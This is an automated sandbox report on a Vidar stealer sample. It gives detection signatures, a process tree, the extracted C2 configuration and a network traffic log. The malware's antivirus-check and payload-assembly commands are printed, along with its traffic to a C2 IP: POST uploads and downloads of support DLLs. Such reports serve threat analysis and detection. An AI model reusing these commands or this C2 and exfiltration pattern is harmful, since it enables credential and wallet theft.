Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1483134
MD5: 1b0fe9739ef19752cb12647b6a4ba97b
SHA1: 0672bbdf92feea7db8decb5934d921f8c47c3033
SHA256: 151247e9379a755e3bb260cca5c59977e4075d5404db4198f3cec82818412479
Tags: exe
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6112 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1B0FE9739EF19752CB12647B6A4BA97B)
    • cmd.exe (PID: 3704 cmdline: "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3768 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 1672 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 2940 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5856 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4088 cmdline: cmd /c md 229536 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 5500 cmdline: findstr /V "ReprintVerificationMercyRepository" Elliott MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4156 cmdline: cmd /c copy /b Exhibit + Rand + Hours 229536\U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Webster.pif (PID: 5740 cmdline: 229536\Webster.pif 229536\U MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
      • timeout.exe (PID: 1020 cmdline: timeout 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "1a72eb06939ea478753d5c4df4b2bd32"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
11.2.Webster.pif.47f0000.6.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
11.2.Webster.pif.1b4b810.5.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
11.2.Webster.pif.17ad098.1.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
11.2.Webster.pif.1b4b810.5.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
11.2.Webster.pif.17ad098.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source: Process started, Author: Max Altgelt (Nextron Systems): Data: Command: 229536\Webster.pif 229536\U, CommandLine: 229536\Webster.pif 229536\U, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3704, ParentProcessName: cmd.exe, ProcessCommandLine: 229536\Webster.pif 229536\U, ProcessId: 5740, ProcessName: Webster.pif
Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6112, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit, ProcessId: 3704, ProcessName: cmd.exe

                        HIPS / PFW / Operating System Protection Evasion

Source: Process started, Author: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3704, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 5856, ProcessName: findstr.exe
                        No Snort rule has matched

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-07-26T17:53:22.098195+0200 | 2022930 | 443 | 49715 | TCP | A Network Trojan was detected
2024-07-26T17:54:58.184294+0200 | 2028765 | 64186 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:45.026078+0200 | 2011803 | 443 | 64179 | TCP | Executable code was detected
2024-07-26T17:54:29.091020+0200 | 2049087 | 64170 | 443 | TCP | A Network Trojan was detected
2024-07-26T17:54:24.958434+0200 | 2028765 | 64168 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:32.339070+0200 | 2028765 | 64172 | 443 | TCP | Unknown Traffic
2024-07-26T17:55:03.839325+0200 | 2028765 | 64189 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:28.443967+0200 | 2028765 | 64170 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:38.210507+0200 | 2028765 | 64175 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:32.999458+0200 | 2051831 | 443 | 64172 | TCP | Malware Command and Control Activity Detected
2024-07-26T17:54:32.999290+0200 | 2049087 | 64172 | 443 | TCP | A Network Trojan was detected
2024-07-26T17:54:26.883415+0200 | 2028765 | 64169 | 443 | TCP | Unknown Traffic
2024-07-26T17:53:44.137634+0200 | 2022930 | 443 | 64166 | TCP | A Network Trojan was detected
2024-07-26T17:54:37.094243+0200 | 2011803 | 443 | 64174 | TCP | Executable code was detected
2024-07-26T17:54:34.845731+0200 | 2028765 | 64173 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:44.185245+0200 | 2028765 | 64179 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:48.385165+0200 | 2028765 | 64181 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:39.270003+0200 | 2028765 | 64176 | 443 | TCP | Unknown Traffic
2024-07-26T17:53:42.765660+0200 | 2022930 | 443 | 64165 | TCP | A Network Trojan was detected
2024-07-26T17:55:05.455054+0200 | 2028765 | 64190 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:46.289932+0200 | 2028765 | 64180 | 443 | TCP | Unknown Traffic
2024-07-26T17:55:01.759091+0200 | 2028765 | 64188 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:55.817975+0200 | 2028765 | 64184 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:59.450351+0200 | 2028765 | 64187 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:35.007420+0200 | 2028765 | 64174 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:41.779288+0200 | 2028765 | 64178 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:40.682041+0200 | 2028765 | 64177 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:51.783629+0200 | 2028765 | 64183 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:56.797425+0200 | 2028765 | 64185 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:31.666423+0200 | 2044247 | 443 | 64171 | TCP | Malware Command and Control Activity Detected
2024-07-26T17:54:29.989042+0200 | 2028765 | 64171 | 443 | TCP | Unknown Traffic
2024-07-26T17:54:50.224091+0200 | 2028765 | 64182 | 443 | TCP | Unknown Traffic

                        AV Detection

Source: 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "1a72eb06939ea478753d5c4df4b2bd32"}
Source: file.exe, ReversingLabs: Detection: 29%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 98.1% probability
Source: file.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.6:64167 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.6:64168 version: TLS 1.2
Source: file.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: Webster.pif, 0000000B.00000002.3346342228.000000006C8CD000.00000002.00000001.01000000.00000009.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                        Source: Binary string: freebl3.pdb source: Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                        Source: Binary string: freebl3.pdbp source: Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                        Source: Binary string: nss3.pdb@ source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: softokn3.pdb@ source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Webster.pif, 0000000B.00000002.3339217037.000000002B6B6000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Webster.pif, 0000000B.00000002.3334527572.000000001F7DA000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                        Source: Binary string: nss3.pdb source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: mozglue.pdb source: Webster.pif, 0000000B.00000002.3346342228.000000006C8CD000.00000002.00000001.01000000.00000009.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, Code function: 11_2_00AE4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00AE4005
Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, Code function: 11_2_00AE494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00AE494A
Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, Code function: 11_2_00AEC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00AEC2FF
Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, Code function: 11_2_00AECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00AECD9F
Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, Code function: 11_2_00AECD14 FindFirstFileW,FindClose,11_2_00AECD14
Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, Code function: 11_2_00AEF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00AEF5D8
Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, Code function: 11_2_00AEF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00AEF735
Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, Code function: 11_2_00AEFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00AEFA36
Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, Code function: 11_2_00AE3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00AE3CE2
Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

                        Networking

Source: Malware configuration extractor, URLs: https://steamcommunity.com/profiles/76561199747278259
Source: global traffic, HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View, IP Address: 23.197.127.21 23.197.127.21
Source: Joe Sandbox View, ASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU
Source: Joe Sandbox View, JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAK | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 279 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFH | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKF | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GDHDAEBGCAAFIDGCGDHI | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 332 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJK | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 5105 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /sqls.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAE | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 829 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DBAEHCGHIIIDHIECFHJD | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJD | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIIJDHCGCBKECBFIJKKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 465Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 131049Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: unknown | TCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif | Code function: 11_2_00AF29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 11_2_00AF29BA
                        Source: global traffic | HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic | DNS traffic detected: DNS query: FGQNrbtYCvA.FGQNrbtYCvA
                        Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
                        Source: global traffic | DNS traffic detected: DNS query: 86.23.85.13.in-addr.arpa
                        Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                        Source: unknown | HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
